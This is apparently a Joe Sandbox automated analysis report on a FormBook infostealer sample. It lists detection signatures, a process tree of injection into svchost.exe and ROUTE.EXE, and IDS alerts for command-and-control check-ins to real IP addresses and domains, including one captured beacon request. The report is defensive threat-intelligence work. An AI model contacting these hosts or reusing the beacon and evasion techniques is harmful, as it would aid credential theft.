Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
gH3LlhcRzg.exe

Overview

General Information

Sample name:gH3LlhcRzg.exe
renamed because original name is a hash value
Original sample name:950beb7d3de2bad234415e45b789304bd6ac6e50e6435a78f85e188f03044ae9.exe
Analysis ID:1588237
MD5:a238864f937038d6fe39092719a1eff0
SHA1:64dee05a230179d9b8baf50fba1722efecc84a67
SHA256:950beb7d3de2bad234415e45b789304bd6ac6e50e6435a78f85e188f03044ae9
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • gH3LlhcRzg.exe (PID: 7520 cmdline: "C:\Users\user\Desktop\gH3LlhcRzg.exe" MD5: A238864F937038D6FE39092719A1EFF0)
    • svchost.exe (PID: 7584 cmdline: "C:\Users\user\Desktop\gH3LlhcRzg.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • YLmLMhEKNXTfg.exe (PID: 3316 cmdline: "C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • ROUTE.EXE (PID: 7940 cmdline: "C:\Windows\SysWOW64\ROUTE.EXE" MD5: C563191ED28A926BCFDB1071374575F1)
          • YLmLMhEKNXTfg.exe (PID: 5636 cmdline: "C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8152 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.3226300583.0000000002C00000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.3225975390.0000000000720000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.1711994414.00000000069E0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000007.00000002.3227836129.0000000002E80000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000008.00000002.3229916982.0000000005130000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\gH3LlhcRzg.exe", CommandLine: "C:\Users\user\Desktop\gH3LlhcRzg.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\gH3LlhcRzg.exe", ParentImage: C:\Users\user\Desktop\gH3LlhcRzg.exe, ParentProcessId: 7520, ParentProcessName: gH3LlhcRzg.exe, ProcessCommandLine: "C:\Users\user\Desktop\gH3LlhcRzg.exe", ProcessId: 7584, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\gH3LlhcRzg.exe", CommandLine: "C:\Users\user\Desktop\gH3LlhcRzg.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\gH3LlhcRzg.exe", ParentImage: C:\Users\user\Desktop\gH3LlhcRzg.exe, ParentProcessId: 7520, ParentProcessName: gH3LlhcRzg.exe, ProcessCommandLine: "C:\Users\user\Desktop\gH3LlhcRzg.exe", ProcessId: 7584, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T23:05:40.618251+010020507451Malware Command and Control Activity Detected192.168.2.949974188.114.97.380TCP
                2025-01-10T23:06:04.680350+010020507451Malware Command and Control Activity Detected192.168.2.949979208.91.197.2780TCP
                2025-01-10T23:06:17.983468+010020507451Malware Command and Control Activity Detected192.168.2.949983209.74.79.4080TCP
                2025-01-10T23:06:45.893450+010020507451Malware Command and Control Activity Detected192.168.2.949987104.21.96.180TCP
                2025-01-10T23:07:07.337601+010020507451Malware Command and Control Activity Detected192.168.2.949991144.76.229.20380TCP
                2025-01-10T23:07:20.696839+010020507451Malware Command and Control Activity Detected192.168.2.949995172.67.182.19880TCP
                2025-01-10T23:07:33.879744+010020507451Malware Command and Control Activity Detected192.168.2.94999913.248.169.4880TCP
                2025-01-10T23:07:48.025418+010020507451Malware Command and Control Activity Detected192.168.2.950003160.25.166.12380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T23:05:40.618251+010028554651A Network Trojan was detected192.168.2.949974188.114.97.380TCP
                2025-01-10T23:06:04.680350+010028554651A Network Trojan was detected192.168.2.949979208.91.197.2780TCP
                2025-01-10T23:06:17.983468+010028554651A Network Trojan was detected192.168.2.949983209.74.79.4080TCP
                2025-01-10T23:06:45.893450+010028554651A Network Trojan was detected192.168.2.949987104.21.96.180TCP
                2025-01-10T23:07:07.337601+010028554651A Network Trojan was detected192.168.2.949991144.76.229.20380TCP
                2025-01-10T23:07:20.696839+010028554651A Network Trojan was detected192.168.2.949995172.67.182.19880TCP
                2025-01-10T23:07:33.879744+010028554651A Network Trojan was detected192.168.2.94999913.248.169.4880TCP
                2025-01-10T23:07:48.025418+010028554651A Network Trojan was detected192.168.2.950003160.25.166.12380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T23:05:56.553179+010028554641A Network Trojan was detected192.168.2.949976208.91.197.2780TCP
                2025-01-10T23:05:59.180842+010028554641A Network Trojan was detected192.168.2.949977208.91.197.2780TCP
                2025-01-10T23:06:01.820857+010028554641A Network Trojan was detected192.168.2.949978208.91.197.2780TCP
                2025-01-10T23:06:10.323108+010028554641A Network Trojan was detected192.168.2.949980209.74.79.4080TCP
                2025-01-10T23:06:12.867599+010028554641A Network Trojan was detected192.168.2.949981209.74.79.4080TCP
                2025-01-10T23:06:15.416830+010028554641A Network Trojan was detected192.168.2.949982209.74.79.4080TCP
                2025-01-10T23:06:38.221913+010028554641A Network Trojan was detected192.168.2.949984104.21.96.180TCP
                2025-01-10T23:06:40.733955+010028554641A Network Trojan was detected192.168.2.949985104.21.96.180TCP
                2025-01-10T23:06:43.329442+010028554641A Network Trojan was detected192.168.2.949986104.21.96.180TCP
                2025-01-10T23:06:59.672017+010028554641A Network Trojan was detected192.168.2.949988144.76.229.20380TCP
                2025-01-10T23:07:02.216873+010028554641A Network Trojan was detected192.168.2.949989144.76.229.20380TCP
                2025-01-10T23:07:04.806807+010028554641A Network Trojan was detected192.168.2.949990144.76.229.20380TCP
                2025-01-10T23:07:13.062340+010028554641A Network Trojan was detected192.168.2.949992172.67.182.19880TCP
                2025-01-10T23:07:15.602706+010028554641A Network Trojan was detected192.168.2.949993172.67.182.19880TCP
                2025-01-10T23:07:18.142286+010028554641A Network Trojan was detected192.168.2.949994172.67.182.19880TCP
                2025-01-10T23:07:26.218382+010028554641A Network Trojan was detected192.168.2.94999613.248.169.4880TCP
                2025-01-10T23:07:28.758948+010028554641A Network Trojan was detected192.168.2.94999713.248.169.4880TCP
                2025-01-10T23:07:31.325757+010028554641A Network Trojan was detected192.168.2.94999813.248.169.4880TCP
                2025-01-10T23:07:40.376353+010028554641A Network Trojan was detected192.168.2.950000160.25.166.12380TCP
                2025-01-10T23:07:42.946312+010028554641A Network Trojan was detected192.168.2.950001160.25.166.12380TCP
                2025-01-10T23:07:45.439322+010028554641A Network Trojan was detected192.168.2.950002160.25.166.12380TCP
                2025-01-10T23:07:53.661162+010028554641A Network Trojan was detected192.168.2.95000468.66.226.11980TCP
                2025-01-10T23:07:56.232725+010028554641A Network Trojan was detected192.168.2.95000568.66.226.11980TCP
                2025-01-10T23:07:59.240228+010028554641A Network Trojan was detected192.168.2.95000668.66.226.11980TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: gH3LlhcRzg.exeVirustotal: Detection: 36%Perma Link
                Source: gH3LlhcRzg.exeReversingLabs: Detection: 91%
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3226300583.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3225975390.0000000000720000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1711994414.00000000069E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3227836129.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3229916982.0000000005130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3227680610.0000000005F40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1711288888.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1716772538.00000000088D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: gH3LlhcRzg.exeJoe Sandbox ML: detected
                Source: gH3LlhcRzg.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: route.pdb source: svchost.exe, 00000002.00000003.1678399965.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1711485129.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000006.00000003.1648733208.000000000127B000.00000004.00000020.00020000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000006.00000002.3226874358.0000000001267000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YLmLMhEKNXTfg.exe, 00000006.00000000.1626737870.00000000007AE000.00000002.00000001.01000000.00000005.sdmp, YLmLMhEKNXTfg.exe, 00000008.00000000.1778157226.00000000007AE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: gH3LlhcRzg.exe, 00000000.00000003.1385199866.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, gH3LlhcRzg.exe, 00000000.00000003.1393028845.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1711593848.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1605864959.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1608594134.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1711593848.0000000003400000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000003.1711628069.0000000002E83000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3228296453.00000000031E0000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000003.1713625113.0000000003038000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3228296453.000000000337E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: gH3LlhcRzg.exe, 00000000.00000003.1385199866.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, gH3LlhcRzg.exe, 00000000.00000003.1393028845.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1711593848.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1605864959.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1608594134.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1711593848.0000000003400000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, ROUTE.EXE, 00000007.00000003.1711628069.0000000002E83000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3228296453.00000000031E0000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000003.1713625113.0000000003038000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3228296453.000000000337E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: ROUTE.EXE, 00000007.00000002.3229283746.000000000380C000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3226358408.0000000002C5E000.00000004.00000020.00020000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000008.00000002.3228307106.0000000002CFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2009532526.000000002794C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: route.pdbGCTL source: svchost.exe, 00000002.00000003.1678399965.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1711485129.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000006.00000003.1648733208.000000000127B000.00000004.00000020.00020000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000006.00000002.3226874358.0000000001267000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: ROUTE.EXE, 00000007.00000002.3229283746.000000000380C000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3226358408.0000000002C5E000.00000004.00000020.00020000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000008.00000002.3228307106.0000000002CFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2009532526.000000002794C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D3445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00D3445A
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D3C6D1 FindFirstFileW,FindClose,0_2_00D3C6D1
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D3C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00D3C75C
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D3EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00D3EF95
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D3F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00D3F0F2
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D3F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00D3F3F3
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D337EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00D337EF
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D33B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00D33B12
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D3BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00D3BCBC
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_0073C2C0 FindFirstFileW,FindNextFileW,FindClose,7_2_0073C2C0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4x nop then xor eax, eax7_2_00729EB0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4x nop then mov ebx, 00000004h7_2_02F804CE

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49984 -> 104.21.96.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49981 -> 209.74.79.40:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49978 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:50003 -> 160.25.166.123:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49983 -> 209.74.79.40:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:50003 -> 160.25.166.123:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49983 -> 209.74.79.40:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49992 -> 172.67.182.198:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49976 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49999 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49999 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:50006 -> 68.66.226.119:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49994 -> 172.67.182.198:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49974 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49974 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:50005 -> 68.66.226.119:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49995 -> 172.67.182.198:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49982 -> 209.74.79.40:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:50002 -> 160.25.166.123:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49995 -> 172.67.182.198:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49993 -> 172.67.182.198:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49990 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49989 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49979 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49979 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49977 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49996 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49991 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49991 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49985 -> 104.21.96.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:50000 -> 160.25.166.123:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49980 -> 209.74.79.40:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49987 -> 104.21.96.1:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49987 -> 104.21.96.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49986 -> 104.21.96.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49997 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:50004 -> 68.66.226.119:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:50001 -> 160.25.166.123:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49988 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49998 -> 13.248.169.48:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.366800008.xyz
                Source: DNS query: www.366800008.xyz
                Source: DNS query: www.366800008.xyz
                Source: DNS query: www.366800008.xyz
                Source: DNS query: www.366800008.xyz
                Source: DNS query: www.366800008.xyz
                Source: DNS query: www.031233226.xyz
                Source: DNS query: www.pitaloka.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                Source: Joe Sandbox ViewASN Name: GIGAINFRASoftbankBBCorpJP GIGAINFRASoftbankBBCorpJP
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D422EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00D422EE
                Source: global trafficHTTP traffic detected: GET /2jc0/?bdi02je=02ITxlk7k5y73RXcEgyHf9eN5gBctaG4x5Z2Hm75JBt4EXaberRL5XNENm6Llqf4eDkRLvOACOcTLUte5cKTzLCIux+gwKEOB3rpq+QpBMz0/Iw+6w==&dZOh=OjIxv4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.einpisalpace.shopConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
